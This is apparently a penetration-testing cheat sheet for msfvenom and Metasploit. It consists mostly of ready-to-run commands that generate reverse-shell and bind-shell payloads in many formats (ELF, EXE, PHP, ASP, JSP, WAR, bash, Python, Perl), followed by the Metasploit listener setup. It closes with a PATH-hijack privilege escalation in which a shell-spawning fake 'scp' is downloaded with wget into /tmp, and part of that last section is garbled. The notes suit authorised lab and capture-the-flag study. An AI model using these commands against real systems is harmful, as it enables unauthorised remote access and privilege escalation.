msfvenom
Show all payloads
msfvenom -l payloads
Show all payload formats
msfvenom -l formats
Generate a payload
msfvenom -p <payload> LHOST=<attacker IP> LPORT=<attacker port> -f <format> -o <output payload file name>
Common payloads
meterpreter
linux/x86/meterpreter/reverse_tcp | linux x86 reverse shell |
linux/x64/meterpreter/reverse_tcp | linux x64 reverse shell |
windows/meterpreter/reverse_tcp | windows x86 reverse shell |
windows/x64/meterpreter/reverse_tcp | windows x64 reverse shell |
Staged
linux/x86/shell/bind_tcp | linux x86 bind shell |
linux/x86/shell/reverse_tcp | linux x86 reverse shell |
windows/shell/bind_tcp | windows x86 bind shell |
windows/shell/reverse_tcp | windows x86 reverse shell |
Nonstaged
linux/x86/shell_bind_tcp | linux x86 bind shell |
linux/x86/shell_reverse_tcp | linux x86 reverse shell |
windows/shell_bind_tcp | windows x86 bind shell |
windows/shell_reverse_tcp | windows x86 reverse shell |
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh
msfvenom -p cmd/unix/reverse_perl LHOST=<IP> LPORT=<PORT> -f raw > shell.pl
Metasploit
use exploit/multi/handler
set PAYLOAD <PAYLOAD>
set LHOST <LHOST>
set LPORT <LPORT>
set ExitOnSession false
exploit -j -z
this creates a command for scp.
msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o scp
wget 192.168.1.23/scp -O /tmp/s** # transfer the exec binary over to Sufferance chmod 755 /tmp/scp
export PATH=/tmp:$PATH --> it sets the tmp as the path
/usr/local/bin/ # it'll now call our "special" scp binary in /tmp instead
Last modified 10mo ago